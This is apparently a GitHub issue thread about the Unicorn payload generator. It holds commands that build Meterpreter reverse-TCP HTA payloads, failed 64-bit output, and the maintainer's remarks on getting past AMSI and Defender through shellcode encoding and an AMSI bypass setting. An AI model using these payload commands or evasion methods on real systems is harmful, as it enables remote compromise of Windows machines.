Closed confuciussayuhm closed 5 years ago
trustedsec
commented
5 years ago You would not use a 64-bit payload in Unicorn, its designed for downgrades to a 32-bit process through SYSWOW64 on 64 bit systems. This allows native 32-bit shellcode to be used on both 32-bit systems and 64 bit systems.
confuciussayuhm
commented
5 years ago Ah! Makes sense now! There is a problem though with this 32bit downgrade. The current bypasses for AMSI on Windows 10 can only patch the 64bit amsi.dll from a 64bit process. This means that no matter how hard a user of unicorn tries to execute post exploitation powershell scripts they will be blocked by AMSI on Windows 10. For more information about this check out Rasta_Mouse's blog post: https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/
trustedsec
commented
5 years ago The problem with the AMSI bypass techniques is that as soon as they are published, a signature is released in order to identify it through defender. Defender will scan, then send to AMSI, then scan again. I do have AMSI_BYPASS already built in, you need to edit unicorn.py and turn AMSI_BYPASS to on however it gets flagged by defender. Unicorn in its current state doesn't need to worry about AMSI because it encodes the shellcode so that static signatures can't identify it. If you look at the decoded form, the shellcode is all mangled and uniquely every time. There's no need to bypass AMSI as AMSI is still static signatures just in a clearer form to defender as the AMSI provider.
Hello there,
I am able to use unicorn.py to generate 32bit metasploit payloads
python unicorn.py windows/meterpreter/reverse_tcp 0.0.0.0 444 htaHowever, when I try using unicfon.py to generate a 64bit metasploit payload:
python unicorn.py windows/x64/meterpreter/reverse_tcp 0.0.0.0 444 hta [*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode... [!] Shellcode was not generated for some reason. Check payload name and if Metasploit is working and try again. Exiting....My OS:
cat /etc/*release* DISTRIB_ID=Kali DISTRIB_RELEASE=kali-rolling DISTRIB_CODENAME=kali-rolling DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling" PRETTY_NAME="Kali GNU/Linux Rolling" NAME="Kali GNU/Linux" ID=kali VERSION="2019.1" VERSION_ID="2019.1" ID_LIKE=debian ANSI_COLOR="1;31" HOME_URL="https://www.kali.org/" SUPPORT_URL="https://forums.kali.org/" BUG_REPORT_URL="https://bugs.kali.org/"